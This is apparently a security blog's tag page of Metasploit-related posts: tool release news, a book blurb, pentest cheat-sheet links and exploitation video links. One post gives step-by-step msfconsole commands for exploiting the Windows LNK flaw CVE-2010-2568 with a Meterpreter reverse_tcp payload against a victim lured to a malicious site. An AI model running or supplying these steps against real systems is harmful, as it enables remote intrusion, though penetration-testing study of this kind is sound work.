Posts tagged metasploit

 

BackTrack 5 R1 released

0

 

 

 

 

BackTrack guys have Released a Updated Version of BackTrack 5 with Lot of new Tools and Updates.for more Information check out the Below Link.

http://www.backtrack-linux.org/backtrack/backtrack-5-r1-released/

http://www.backtrack-linux.org/downloads/

 

Metasploit: A Penetration Tester’s Guide Book Comming Soon

2

 

Metasploit: A Penetration Tester’s Guide will teach you how to:

  • Find and exploit unmaintained, misconfigured, and unpatched systems
  • Perform reconnaissance and find valuable information about your target
  • Bypass anti-virus technologies and circumvent security controls
  • Integrate Nmap, NeXpose, and Nessus with Metasploit to automate discovery
  • Use the Meterpreter shell to launch further attacks from inside the network
  • Harness standalone Metasploit utilities, third-party tools, and plug-ins
  • Learn how to write your own Meterpreter post exploitation modules and scripts

http://www.amazon.com/Metasploit-Penetration-Testers-David-Kennedy/dp/159327288X

Add Video

Exploiting Windows LNK vulnerability (CVE-2010-2568)

0

Recently there has been detected a new 0 day exploit which takes advantage of Windows incorrectly parses shortcuts so that malicious code can be executed when the icon of a specially crafted shortcut is displayed. this can be exploited locally through a malicious USB drive, or remotely via network shares and WebDAV.Recently metasploit have pushed the exploit to the msf module.still there is no patch relased for this vulnerability.
there are 2 ways to exploit this

1)keep these 2 files LNK file and the DLL in the USb stick and run on the victim machine
2)or trick the victim in accessing the maclicious site.
we will use 2 nd method .
3)svn update (update ur msf)
3)use windows/browser/ms10_xxx_windows_shell_lnk_execute
4)set payload windows/meterpreter/reverse_tcp
5)set LHOST 192.168.0.103 (your ip)
6)set LPORT 1427 (any port)
7)exploit

chk out my video to accomplish the above method Exploiting Windows LNK vulnerability (CVE-2010-2568)

Metasploit Framework 3.4.1 Released

0

The Metasploit Project is proud to announce the release of the Metasploit Framework version 3.4.1. As always, you can get it from our downloads page,

Security Assessment and Pentest tools Cheat Sheets

3

Got from my old Bookmarks ,below are some useful Cheat Sheets ,let me know if u found any other cheat sheets i will update the post

Nmap
http://sbdtools.googlecode.com/files/Nmap5%20cheatsheet%20eng%20v1.pdf

Nessus
http://www.secguru.com/link/nessus_nmap_scanning_cheatsheet
Backtrack 4
http://www.corelan.be:8800/index.php/2009/07/04/backtrack-4-cheat-sheet/
misc tools
http://www.sans.org/resources/sec560/misc_tools_sheet_v1.pdf
Metasploit Meterpreter
http://en.wikibooks.org/wiki/Metasploit/MeterpreterClient
http://www.rmccurdy.com/scripts/Metasploit%20meterpreter%20cheat%20sheet%20reference.html


Oracle Security
http://www.red-database-security.com/wp/oracle_cheat.pdf
XSS
http://ha.ckers.org/xss.html
http://openmya.hacker.jp/hasegawa/security/utf7cs.html
http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

SQl Injection
http://ha.ckers.org/sqlinjection/
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
http://ferruh.mavituna.com/oracle-sql-injection-cheat-sheet-oku/
http://www.irongeek.com/xss-sql-injection-fuzzing-barcode-generator.php

Microsoft SQL,Sybase,MySQL,Oracle,PostgreSQL,DB2,IngresBypass SQL Injection Filters
http://michaeldaw.org/sql-injection-cheat-sheet
http://pentestmonkey.net/cheat-sheets/
Packetlife Cheatsheets

http://packetlife.net/cheatsheets/

Ed Skoudis’ Pentest Cheatsheets

Windows commandline tools
http://www.sans.org/resources/sec560/windows_command_line_sheet_v1.pdf
Netcat Cheat Sheet
http://www.sans.org/resources/sec560/netcat_cheat_sheet_v1.pdf
Useful Attack Tools, Metasploit commands, HPing, FGDump
http://www.sans.org/resources/sec560/misc_tools_sheet_v1.pdf

Reverse Engineering Malware Cheat Sheet

http://zeltser.com/reverse-malware/reverse-malware-cheat-sheet.html

Security Archiecture Cheat Sheet for Internet Applications

http://zeltser.com/security-management/security-architecture-cheat-sheet.html

CEH cheatsheets from Mindcert

http://www.mindcert.com/resources/MindCert_Nmap_MindMap.pdf

http://www.mindcert.com/resources/MindCert_CEH_Enumeration_MindMap.pdf

http://www.mindcert.com/resources/MindCert_CEH_Ethical_Hacking_MindMap.pdf

http://www.mindcert.com/resources/MindCert_CEH_Footprinting_MindMap.pdf

http://www.mindcert.com/resources/MindCert_CEH_Scanning_MindMap.pdf

http://www.mindcert.com/resources/MindCert_CEH_System_Hacking_MindMap.pdf

http://www.mindcert.com/resources/MindCert_CEH_Trojans_MindMap.pdf

http://www.mindcert.com/resources/CCNA_Cisco_IP_Routing.pdf

Metasploit MeterpreterClient wiki

0

Detailed metasploit meterpreter core commands

kudos for bond for sharing this link

http://en.wikibooks.org/wiki/Metasploit/MeterpreterClient

Exploitation Videos from Dino Dai Zovi

0

Found Interesting videos on Exploitation

Dino Dai Zovi’s Memory Corruption 101

Basic debugging for exploit development

http://vimeo.com/5113617

Exploitation 102

Exploit mitigations, shellcoding, and Metasploit with Dino Dai Zovi.

Go to Top